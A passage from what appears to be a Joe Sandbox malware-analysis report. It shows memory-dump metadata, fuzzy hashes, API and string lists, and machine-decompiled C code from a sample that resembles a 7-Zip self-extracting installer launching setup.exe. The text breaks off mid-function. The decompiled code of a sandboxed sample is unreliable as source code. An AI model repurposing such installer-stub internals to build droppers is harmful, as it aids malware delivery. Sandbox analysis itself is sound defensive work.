                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$CurrentDirectory$Message$CloseHandle$CommandExecuteFileLineModuleNameObjectShellSingleVersionWait
                                          • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$> @$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$ExecuteFile$ExecuteParameters$RunProgram$Title$setup.exe
                                          • API String ID: 2760820266-829806607
                                          • Opcode ID: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                                          • Instruction ID: 30a6e78c0a87ce65c61bf6c489231b06ab30573cf11c386798d37ebdc1e5dfdc
                                          • Opcode Fuzzy Hash: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                                          • Instruction Fuzzy Hash: 57524971D002199ADF21EFA1DC85AEEBB75BF04318F1040BFE149761A2DB395A85CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E0040AD19(char* __ecx, void* __eflags) {
                                          				signed int _t373;
                                          				signed int _t382;
                                          				intOrPtr* _t417;
                                          				signed int _t419;
                                          				signed int _t423;
                                          				signed int _t429;
                                          				signed int _t430;
                                          				intOrPtr* _t440;
                                          				intOrPtr* _t441;
                                          				signed int _t453;
                                          				signed int _t462;
                                          				signed int _t463;
                                          				signed int _t464;
                                          				signed int _t471;
                                          				signed int _t482;
                                          				signed int _t483;
                                          				signed int _t484;
                                          				signed int _t490;
                                          				signed int _t504;
                                          				signed int _t505;
                                          				intOrPtr _t507;
                                          				signed int _t508;
                                          				signed char _t510;
                                          				char _t512;
                                          				intOrPtr* _t513;
                                          				signed int _t518;
                                          				signed int _t523;
                                          				signed int _t535;
                                          				signed int _t537;
                                          				signed int _t538;
                                          				signed int _t539;
                                          				intOrPtr* _t540;
                                          				signed int _t580;
                                          				signed int _t581;
                                          				intOrPtr _t589;
                                          				signed int _t595;
                                          				signed int _t626;
                                          				signed int _t652;
                                          				signed int _t653;
                                          				char* _t658;
                                          				signed int _t660;
                                          				signed int _t661;
                                          				intOrPtr* _t662;
                                          				signed int _t664;
                                          				signed int* _t667;
                                          				signed int _t668;
                                          				signed int _t669;
                                          				signed int _t670;
                                          				intOrPtr _t671;
                                          				signed int _t672;
                                          				signed int _t673;
                                          				signed int _t674;
                                          				intOrPtr _t675;
                                          				intOrPtr* _t676;
                                          				signed int _t677;
                                          				void* _t678;
                                          
                                          				E00413954(E0041A132, _t678);
                                          				_t664 =  *(_t678 + 0x18);
                                          				_t658 = __ecx;
                                          				 *((intOrPtr*)(_t678 - 0x30)) = __ecx;
                                          				if(E0040D7CC(_t664) == 0) {
                                          					L81:
                                          					_t373 = 0x80004001;
                                          					L114:
                                          					 *[fs:0x0] =  *((intOrPtr*)(_t678 - 0xc));
                                          					return _t373;
                                          				}
                                          				E00402155(_t678 - 0x2c);
                                          				 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          				 *(_t678 - 4) = 0;
                                          				 *((intOrPtr*)(_t678 - 0x50)) = 0;
                                          				E00413310(_t678 - 0x4c);
                                          				 *(_t678 - 4) = 1;
                                          				E0040640D(_t678 - 0x50,  *(_t678 + 8));
                                          				 *(_t678 + 8) = 0;
                                          				if( *((intOrPtr*)(_t664 + 0x30)) <= 0) {
                                          					L19:
                                          					_t535 =  *( *(_t678 + 0x18) + 8);
                                          					 *(_t678 - 0x18) = _t535;
                                          					E0040ACC4(_t678 - 0xf8);
                                          					 *(_t678 - 4) = 4;
                                          					E0040B99B(_t678 - 0xa8);
                                          					 *(_t678 - 4) = 5;
                                          					E0040B63C( *(_t678 + 0x18), _t678 - 0xf8);
                                          					if( *_t658 == 0) {
                                          						L21:
                                          						E004042D6();
                                          						_t382 =  *(_t658 + 0x74);
                                          						_t667 = _t658 + 0x74;
                                          						if(_t382 != 0) {
                                          							 *((intOrPtr*)( *_t382 + 8))(_t382);
                                          							 *_t667 =  *_t667 & 0x00000000;
                                          						}
                                          						if( *((char*)(_t658 + 0x68)) != 0) {
                                          							_push(0x88);
                                          							_t504 = E00403A76();
                                          							 *(_t678 + 8) = _t504;
                                          							 *(_t678 - 4) = 6;
                                          							if(_t504 == 0) {
                                          								_t505 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t505 = E0040B860(_t504);
                                          							}
                                          							 *(_t678 - 4) = 5;
                                          							 *((intOrPtr*)(_t658 + 0x6c)) = _t505;
                                          							E0040640D(_t667, _t505);
                                          							_t507 =  *((intOrPtr*)(_t658 + 0x6c));
                                          							if(_t507 == 0) {
                                          								_t508 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t508 = _t507 + 4;
                                          							}
                                          							 *((intOrPtr*)(_t658 + 0x70)) = _t508;
                                          						}
                                          						_t668 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70))))))(_t678 - 0xf8);
                                          						_t700 = _t668;
                                          						if(_t668 == 0) {
                                          							 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
                                          							__eflags = _t535;
                                          							if(__eflags <= 0) {
                                          								L50:
                                          								E0040B96F(_t658 + 4, __eflags, _t678 - 0xf8);
                                          								 *_t658 = 1;
                                          								L51:
                                          								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70)))) + 4))();
                                          								_t669 = 0;
                                          								__eflags =  *(_t678 - 0x18);
                                          								 *((intOrPtr*)(_t678 - 0x34)) = 0;
                                          								 *(_t678 + 0x10) = 0;
                                          								 *(_t678 - 0x14) = 0;
                                          								if( *(_t678 - 0x18) <= 0) {
                                          									L105:
                                          									E0040A402(_t678 - 0xf8,  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0xb0)))), _t678 - 0x58, _t678 - 0xfc);
                                          									__eflags =  *((char*)(_t658 + 0x68));
                                          									if( *((char*)(_t658 + 0x68)) != 0) {
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t678 - 0x58));
                                          									}
                                          									__eflags =  *(_t678 - 0x18) - _t669;
                                          									if( *(_t678 - 0x18) != _t669) {
                                          										E004032A8(_t678 - 0x94, 4);
                                          										 *((intOrPtr*)(_t678 - 0x94)) = 0x41b6b8;
                                          										 *(_t678 - 4) = 0x1d;
                                          										E00404327(_t678 - 0x94,  *(_t678 - 0x24));
                                          										_t670 = 0;
                                          										__eflags =  *(_t678 - 0x24);
                                          										if( *(_t678 - 0x24) <= 0) {
                                          											L112:
                                          											_t660 =  *(_t658 + 0x74);
                                          											 *((intOrPtr*)(_t678 - 0x54)) =  *((intOrPtr*)(_t678 + 0x1c));
                                          											_t668 =  *((intOrPtr*)( *_t660 + 0xc))(_t660,  *((intOrPtr*)(_t678 - 0x88)), 0,  *(_t678 - 0x24), _t678 - 0x54, 0, 1,  *((intOrPtr*)(_t678 + 0x20)));
                                          											 *(_t678 - 4) = 5;
                                          											E004042AD(_t678 - 0x94);
                                          											 *(_t678 - 4) = 0x1e;
                                          											E004042AD(_t678 - 0xa8);
                                          											 *(_t678 - 4) = 1;
                                          											E004099BC(_t678 - 0xf8, __eflags);
                                          											 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                                          											E0040B845(_t678 - 0x50);
                                          											_t366 = _t678 - 4;
                                          											 *_t366 =  *(_t678 - 4) | 0xffffffff;
                                          											__eflags =  *_t366;
                                          											E0040A5AC(_t678 - 0x2c);
                                          											goto L113;
                                          										} else {
                                          											goto L111;
                                          										}
                                          										do {
                                          											L111:
                                          											E004039DF(_t678 - 0x94,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x20)) + _t670 * 4)))));
                                          											_t670 = _t670 + 1;
                                          											__eflags = _t670 -  *(_t678 - 0x24);
                                          										} while (_t670 <  *(_t678 - 0x24));
                                          										goto L112;
                                          									} else {
                                          										 *(_t678 - 4) = 0x1b;
                                          										E004042AD(_t678 - 0xa8);
                                          										 *(_t678 - 4) = 1;
                                          										E004099BC(_t678 - 0xf8, __eflags);
                                          										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                                          										DeleteCriticalSection(_t678 - 0x4c);
                                          										E00403800(_t678 - 0x50);
                                          										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          										 *(_t678 - 4) = 0x1c;
                                          										_t668 = 0;
                                          										__eflags = 0;
                                          										goto L109;
                                          									}
                                          								}
                                          								_t661 =  *(_t678 + 0x18);
                                          								 *(_t678 + 8) = 0;
                                          								do {
                                          									 *(_t678 + 0x18) =  *(_t678 + 0x18) & 0x00000000;
                                          									_t671 =  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0xc)) +  *(_t678 - 0x14) * 4));
                                          									_t417 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 8) +  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x84))))));
                                          									 *(_t678 - 4) = 0x12;
                                          									 *((intOrPtr*)( *_t417))(_t417, 0x41b298, _t678 + 0x18);
                                          									_t419 =  *(_t678 + 0x18);
                                          									__eflags = _t419;
                                          									if(_t419 == 0) {
                                          										L57:
                                          										__eflags = _t419;
                                          										 *(_t678 - 4) = 5;
                                          										if(_t419 != 0) {
                                          											 *((intOrPtr*)( *_t419 + 8))(_t419);
                                          										}
                                          										_t537 =  *(_t671 + 0x14);
                                          										 *(_t678 + 8) =  *(_t678 + 8) + 4;
                                          										_t672 =  *(_t671 + 0x18);
                                          										E004032A8(_t678 - 0x6c, 4);
                                          										 *((intOrPtr*)(_t678 - 0x6c)) = 0x41b68c;
                                          										 *(_t678 - 4) = 0x17;
                                          										E004032A8(_t678 - 0x80, 4);
                                          										 *((intOrPtr*)(_t678 - 0x80)) = 0x41b68c;
                                          										 *(_t678 - 4) = 0x18;
                                          										E00404327(_t678 - 0x6c, _t537);
                                          										_t423 = E00404327(_t678 - 0x80, _t672);
                                          										__eflags = _t672;
                                          										if(_t672 <= 0) {
                                          											L61:
                                          											 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
                                          											__eflags = _t537;
                                          											if(_t537 <= 0) {
                                          												goto L94;
                                          											}
                                          											_t675 =  *((intOrPtr*)(_t678 - 0x34));
                                          											do {
                                          												_t580 =  *(_t661 + 0x1c);
                                          												_t652 = 0;
                                          												__eflags = _t580;
                                          												if(_t580 <= 0) {
                                          													L83:
                                          													_t429 = _t423 | 0xffffffff;
                                          													__eflags = _t429;
                                          													L84:
                                          													__eflags = _t429;
                                          													if(_t429 < 0) {
                                          														_t581 =  *(_t661 + 0x30);
                                          														_t653 = 0;
                                          														__eflags = _t581;
                                          														if(_t581 <= 0) {
                                          															L90:
                                          															_t430 = _t429 | 0xffffffff;
                                          															__eflags = _t430;
                                          															L91:
                                          															__eflags = _t430;
                                          															if(_t430 < 0) {
                                          																 *(_t678 - 4) = 0x17;
                                          																E004042AD(_t678 - 0x80);
                                          																 *(_t678 - 4) = 5;
                                          																E004042AD(_t678 - 0x6c);
                                          																 *(_t678 - 4) = 0x19;
                                          																E004042AD(_t678 - 0xa8);
                                          																 *(_t678 - 4) = 1;
                                          																E004099BC(_t678 - 0xf8, __eflags);
                                          																 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                                          																DeleteCriticalSection(_t678 - 0x4c);
                                          																E00403800(_t678 - 0x50);
                                          																 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          																 *(_t678 - 4) = 0x1a;
                                          																E004042D6();
                                          																 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                                          																E004042AD(_t678 - 0x2c);
                                          																_t373 = 0x80004005;
                                          																goto L114;
                                          															}
                                          															_t589 =  *((intOrPtr*)(_t678 + 0x14));
                                          															goto L93;
                                          														}
                                          														_t441 =  *((intOrPtr*)(_t661 + 0x34));
                                          														while(1) {
                                          															__eflags =  *_t441 - _t675;
                                          															if( *_t441 == _t675) {
                                          																break;
                                          															}
                                          															_t653 = _t653 + 1;
                                          															_t441 = _t441 + 4;
                                          															__eflags = _t653 - _t581;
                                          															if(_t653 < _t581) {
                                          																continue;
                                          															}
                                          															goto L90;
                                          														}
                                          														_t430 = _t653;
                                          														goto L91;
                                          													}
                                          													_t430 =  *( *((intOrPtr*)(_t661 + 0x20)) + 4 + _t429 * 8);
                                          													_t589 =  *((intOrPtr*)(_t661 + 0x48));
                                          													goto L93;
                                          												}
                                          												_t440 =  *((intOrPtr*)(_t661 + 0x20));
                                          												while(1) {
                                          													__eflags =  *_t440 - _t675;
                                          													if( *_t440 == _t675) {
                                          														break;
                                          													}
                                          													_t652 = _t652 + 1;
                                          													_t440 = _t440 + 8;
                                          													__eflags = _t652 - _t580;
                                          													if(_t652 < _t580) {
                                          														continue;
                                          													}
                                          													goto L83;
                                          												}
                                          												_t429 = _t652;
                                          												goto L84;
                                          												L93:
                                          												_t423 = E004039DF(_t678 - 0x6c, _t589 + _t430 * 8);
                                          												 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
                                          												_t675 = _t675 + 1;
                                          												__eflags =  *(_t678 - 0x10) - _t537;
                                          												 *((intOrPtr*)(_t678 - 0x34)) = _t675;
                                          											} while ( *(_t678 - 0x10) < _t537);
                                          											goto L94;
                                          										} else {
                                          											do {
                                          												_t423 = E004039DF(_t678 - 0x80,  *((intOrPtr*)(_t661 + 0x48)) +  *(_t678 + 0x10) * 8);
                                          												 *(_t678 + 0x10) =  *(_t678 + 0x10) + 1;
                                          												_t672 = _t672 - 1;
                                          												__eflags = _t672;
                                          											} while (_t672 != 0);
                                          											goto L61;
                                          										}
                                          									}
                                          									_t595 =  *(_t671 + 0xc);
                                          									__eflags = _t595 - 0xffffffff;
                                          									 *(_t678 - 0x10) = _t595;
                                          									if(_t595 > 0xffffffff) {
                                          										__eflags = _t419;
                                          										 *(_t678 - 4) = 5;
                                          										if(_t419 != 0) {
                                          											 *((intOrPtr*)( *_t419 + 8))(_t419);
                                          										}
                                          										 *(_t678 - 4) = 0x13;
                                          										E004042AD(_t678 - 0xa8);
                                          										 *(_t678 - 4) = 1;
                                          										E004099BC(_t678 - 0xf8, __eflags);
                                          										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                                          										DeleteCriticalSection(_t678 - 0x4c);
                                          										E00403800(_t678 - 0x50);
                                          										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          										 *(_t678 - 4) = 0x14;
                                          										_t538 = 0x80004001;
                                          										L103:
                                          										E004042D6();
                                          										 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                                          										E004042AD(_t678 - 0x2c);
                                          										_t373 = _t538;
                                          										goto L114;
                                          									}
                                          									_t538 =  *((intOrPtr*)( *_t419 + 0xc))(_t419,  *((intOrPtr*)(_t671 + 0x10)),  *(_t678 - 0x10));
                                          									__eflags = _t538;
                                          									if(_t538 != 0) {
                                          										_t453 =  *(_t678 + 0x18);
                                          										 *(_t678 - 4) = 5;
                                          										__eflags = _t453;
                                          										if(_t453 != 0) {
                                          											 *((intOrPtr*)( *_t453 + 8))(_t453);
                                          										}
                                          										 *(_t678 - 4) = 0x15;
                                          										E004042AD(_t678 - 0xa8);
                                          										 *(_t678 - 4) = 1;
                                          										E004099BC(_t678 - 0xf8, __eflags);
                                          										_t287 = _t678 - 4;
                                          										 *_t287 =  *(_t678 - 4) & 0x00000000;
                                          										__eflags =  *_t287;
                                          										DeleteCriticalSection(_t678 - 0x4c);
                                          										E00403800(_t678 - 0x50);
                                          										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          										 *(_t678 - 4) = 0x16;
                                          										goto L103;
                                          									}
                                          									_t419 =  *(_t678 + 0x18);
                                          									goto L57;
                                          									L94:
                                          									_t673 =  *(_t678 - 0x14);
                                          									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x70)))) + 8))(_t673,  *((intOrPtr*)(_t678 - 0x60)),  *((intOrPtr*)(_t678 - 0x74)));
                                          									 *(_t678 - 4) = 0x17;
                                          									E004042AD(_t678 - 0x80);
                                          									 *(_t678 - 4) = 5;
                                          									E004042AD(_t678 - 0x6c);
                                          									_t674 = _t673 + 1;
                                          									__eflags = _t674 -  *(_t678 - 0x18);
                                          									 *(_t678 - 0x14) = _t674;
                                          								} while (_t674 <  *(_t678 - 0x18));
                                          								_t658 =  *((intOrPtr*)(_t678 - 0x30));
                                          								_t669 = 0;
                                          								goto L105;
                                          							} else {
                                          								goto L34;
                                          							}
                                          							while(1) {
                                          								L34:
                                          								_t676 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 0x18) + 0xc)) +  *(_t678 - 0x10) * 4));
                                          								 *(_t678 + 0x10) = 0;
                                          								 *(_t678 + 8) = 0;
                                          								_push(0);
                                          								_push( *((intOrPtr*)(_t676 + 4)));
                                          								 *(_t678 - 4) = 0xa;
                                          								_push( *_t676);
                                          								_t462 = E004063BD(_t678 + 0x10, _t678 + 8, __eflags);
                                          								_t539 = _t462;
                                          								__eflags = _t539;
                                          								if(_t539 != 0) {
                                          									break;
                                          								}
                                          								 *(_t678 - 0x14) =  *(_t678 - 0x14) & _t462;
                                          								__eflags =  *((intOrPtr*)(_t676 + 0x14)) - 1;
                                          								 *(_t678 - 4) = 0xd;
                                          								if( *((intOrPtr*)(_t676 + 0x14)) != 1) {
                                          									L40:
                                          									__eflags =  *(_t678 + 8);
                                          									if( *(_t678 + 8) == 0) {
                                          										_t471 =  *(_t678 + 0x10);
                                          										 *(_t678 - 4) = 5;
                                          										__eflags = _t471;
                                          										if(_t471 != 0) {
                                          											 *((intOrPtr*)( *_t471 + 8))(_t471);
                                          										}
                                          										 *(_t678 - 4) = 0x10;
                                          										E004042AD(_t678 - 0xa8);
                                          										 *(_t678 - 4) = 1;
                                          										E004099BC(_t678 - 0xf8, __eflags);
                                          										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                                          										DeleteCriticalSection(_t678 - 0x4c);
                                          										E00403800(_t678 - 0x50);
                                          										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          										 *(_t678 - 4) = 0x11;
                                          										E004042D6();
                                          										_t237 = _t678 - 4;
                                          										 *_t237 =  *(_t678 - 4) | 0xffffffff;
                                          										__eflags =  *_t237;
                                          										E004042AD(_t678 - 0x2c);
                                          										goto L81;
                                          									}
                                          									E0040640D(_t678 - 0x14,  *(_t678 + 8));
                                          									__eflags =  *((char*)(_t658 + 0x68));
                                          									if(__eflags != 0) {
                                          										E0040A0DE( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 8));
                                          									}
                                          									L43:
                                          									_push(_t678 - 0x14);
                                          									E0040BAB0(_t658 + 0x78);
                                          									_t482 =  *(_t678 - 0x14);
                                          									 *(_t678 - 4) = 0xa;
                                          									__eflags = _t482;
                                          									if(_t482 != 0) {
                                          										 *((intOrPtr*)( *_t482 + 8))(_t482);
                                          									}
                                          									_t483 =  *(_t678 + 8);
                                          									 *(_t678 - 4) = 9;
                                          									__eflags = _t483;
                                          									if(_t483 != 0) {
                                          										 *((intOrPtr*)( *_t483 + 8))(_t483);
                                          									}
                                          									_t484 =  *(_t678 + 0x10);
                                          									 *(_t678 - 4) = 5;
                                          									__eflags = _t484;
                                          									if(_t484 != 0) {
                                          										 *((intOrPtr*)( *_t484 + 8))(_t484);
                                          									}
                                          									 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
                                          									__eflags =  *(_t678 - 0x10) -  *(_t678 - 0x18);
                                          									if(__eflags < 0) {
                                          										continue;
                                          									} else {
                                          										goto L50;
                                          									}
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t676 + 0x18)) - 1;
                                          								if( *((intOrPtr*)(_t676 + 0x18)) != 1) {
                                          									goto L40;
                                          								}
                                          								_t626 =  *(_t678 + 0x10);
                                          								__eflags = _t626;
                                          								if(_t626 == 0) {
                                          									_t490 =  *(_t678 + 8);
                                          									 *(_t678 - 4) = 9;
                                          									__eflags = _t490;
                                          									if(_t490 != 0) {
                                          										 *((intOrPtr*)( *_t490 + 8))(_t490);
                                          										_t626 =  *(_t678 + 0x10);
                                          									}
                                          									__eflags = _t626;
                                          									 *(_t678 - 4) = 5;
                                          									if(_t626 != 0) {
                                          										 *((intOrPtr*)( *_t626 + 8))(_t626);
                                          									}
                                          									 *(_t678 - 4) = 0xe;
                                          									E004042AD(_t678 - 0xa8);
                                          									 *(_t678 - 4) = 1;
                                          									E004099BC(_t678 - 0xf8, __eflags);
                                          									 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                                          									DeleteCriticalSection(_t678 - 0x4c);
                                          									E00403800(_t678 - 0x50);
                                          									 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          									 *(_t678 - 4) = 0xf;
                                          									_t668 = 0x80004001;
                                          									goto L109;
                                          								}
                                          								E0040640D(_t678 - 0x14, _t626);
                                          								__eflags =  *((intOrPtr*)(_t658 + 0x68)) - _t539;
                                          								if(__eflags != 0) {
                                          									E0040A0B9( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 0x10));
                                          								}
                                          								goto L43;
                                          							}
                                          							_t463 =  *(_t678 + 8);
                                          							 *(_t678 - 4) = 9;
                                          							__eflags = _t463;
                                          							if(_t463 != 0) {
                                          								 *((intOrPtr*)( *_t463 + 8))(_t463);
                                          							}
                                          							_t464 =  *(_t678 + 0x10);
                                          							 *(_t678 - 4) = 5;
                                          							__eflags = _t464;
                                          							if(_t464 != 0) {
                                          								 *((intOrPtr*)( *_t464 + 8))(_t464);
                                          							}
                                          							 *(_t678 - 4) = 0xb;
                                          							E004042AD(_t678 - 0xa8);
                                          							 *(_t678 - 4) = 1;
                                          							E004099BC(_t678 - 0xf8, __eflags);
                                          							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                                          							DeleteCriticalSection(_t678 - 0x4c);
                                          							E00403800(_t678 - 0x50);
                                          							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          							 *(_t678 - 4) = 0xc;
                                          							_t668 = _t539;
                                          							goto L109;
                                          						} else {
                                          							 *(_t678 - 4) = 7;
                                          							E004042AD(_t678 - 0xa8);
                                          							 *(_t678 - 4) = 1;
                                          							E004099BC(_t678 - 0xf8, _t700);
                                          							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
                                          							DeleteCriticalSection(_t678 - 0x4c);
                                          							E00403800(_t678 - 0x50);
                                          							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
                                          							 *(_t678 - 4) = 8;
                                          							L109:
                                          							E004042D6();
                                          							 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
                                          							E004042AD(_t678 - 0x2c);
                                          							L113:
                                          							_t373 = _t668;
                                          							goto L114;
                                          						}
                                          					}
                                          					_t510 = E0040B753(_t678 - 0xf8, _t658 + 4);
                                          					asm("sbb al, al");
                                          					_t512 =  ~_t510 + 1;
                                          					 *((char*)(_t678 + 0xb)) = _t512;
                                          					if(_t512 == 0) {
                                          						goto L51;
                                          					}
                                          					goto L21;
                                          				} else {
                                          					_t540 =  *((intOrPtr*)(_t678 + 0x14));
                                          					do {
                                          						_push(0x18);
                                          						_t513 = E00403A76();
                                          						if(_t513 == 0) {
                                          							_t662 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							 *(_t513 + 4) =  *(_t513 + 4) & 0x00000000;
                                          							 *_t513 = 0x41b6e8;
                                          							_t662 = _t513;
                                          						}
                                          						 *((intOrPtr*)(_t678 - 0x34)) = _t662;
                                          						if(_t662 != 0) {
                                          							 *((intOrPtr*)( *_t662 + 4))(_t662);
                                          						}
                                          						_push(0x28);
                                          						 *((intOrPtr*)(_t662 + 8)) = _t678 - 0x50;
                                          						 *((intOrPtr*)(_t662 + 0x10)) =  *((intOrPtr*)(_t678 + 0xc));
                                          						 *(_t662 + 0x14) =  *(_t678 + 0x10);
                                          						 *((intOrPtr*)(_t678 + 0xc)) =  *((intOrPtr*)(_t678 + 0xc)) +  *_t540;
                                          						 *(_t678 - 4) = 2;
                                          						asm("adc [ebp+0x10], ecx");
                                          						_t518 = E00403A76();
                                          						if(_t518 == 0) {
                                          							_t677 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							 *(_t518 + 4) =  *(_t518 + 4) & 0x00000000;
                                          							 *(_t518 + 8) =  *(_t518 + 8) & 0x00000000;
                                          							 *_t518 = 0x41b6d8;
                                          							_t677 = _t518;
                                          						}
                                          						 *(_t678 - 0x18) = _t677;
                                          						if(_t677 != 0) {
                                          							 *((intOrPtr*)( *_t677 + 4))(_t677);
                                          						}
                                          						_t34 = _t677 + 8; // 0x8
                                          						 *(_t678 - 4) = 3;
                                          						E0040640D(_t34, _t662);
                                          						 *(_t677 + 0x18) =  *(_t677 + 0x18) & 0x00000000;
                                          						 *(_t677 + 0x1c) =  *(_t677 + 0x1c) & 0x00000000;
                                          						 *(_t677 + 0x20) =  *(_t677 + 0x20) & 0x00000000;
                                          						 *((intOrPtr*)(_t677 + 0x10)) =  *_t540;
                                          						 *((intOrPtr*)(_t677 + 0x14)) =  *((intOrPtr*)(_t540 + 4));
                                          						_push(_t678 - 0x18);
                                          						E0040A5E4(_t678 - 0x2c);
                                          						_t523 =  *(_t678 - 0x18);
                                          						 *(_t678 - 4) = 2;
                                          						if(_t523 != 0) {
                                          							 *((intOrPtr*)( *_t523 + 8))(_t523);
                                          						}
                                          						 *(_t678 - 4) = 1;
                                          						if(_t662 != 0) {
                                          							 *((intOrPtr*)( *_t662 + 8))(_t662);
                                          						}
                                          						 *(_t678 + 8) =  *(_t678 + 8) + 1;
                                          						_t540 = _t540 + 8;
                                          					} while ( *(_t678 + 8) <  *((intOrPtr*)( *(_t678 + 0x18) + 0x30)));
                                          					_t658 =  *((intOrPtr*)(_t678 - 0x30));
                                          					goto L19;
                                          				}
                                          			}



























































                                          0x0040ae48
                                          0x0040ae51
                                          0x0040ae54
                                          0x0040ae5d
                                          0x00000000
                                          0x0040ae5d

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040AD1E
                                            • Part of subcall function 0040D7CC: __EH_prolog.LIBCMT ref: 0040D7D1
                                            • Part of subcall function 00413310: InitializeCriticalSection.KERNEL32(?,?,?,00000000,00000000), ref: 0041333E
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040AF52
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B1DF
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B24A
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B2A7
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B3B6
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B410
                                          • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 0040B485
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B517
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Delete$H_prolog$Initialize
                                          • String ID:
                                          • API String ID: 3452124646-0
                                          • Opcode ID: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                                          • Instruction ID: 06aa0bffc57edc8446930be4fb3d3ecc4288fdccd94c57135405988f21593cb0
                                          • Opcode Fuzzy Hash: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                                          • Instruction Fuzzy Hash: 5D625E7090024ADFDB14DFA4C944BDDBBB4EF14308F1480AEE815B72D2DB789A49DB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 80%
                                          			E004059B3(void** __ecx) {
                                          				signed int _t23;
                                          				void* _t24;
                                          				signed int _t26;
                                          				intOrPtr* _t29;
                                          				signed int _t31;
                                          				void** _t50;
                                          				void* _t52;
                                          				intOrPtr _t57;
                                          
                                          				E00413954(E00419734, _t52);
                                          				_t57 =  *0x423148; // 0x1
                                          				_t50 = __ecx;
                                          				if(_t57 != 0) {
                                          					_t23 = E00405A63(__ecx);
                                          					__eflags = _t23;
                                          					if(_t23 != 0) {
                                          						_t14 = _t52 + 0x14; // 0x414be4
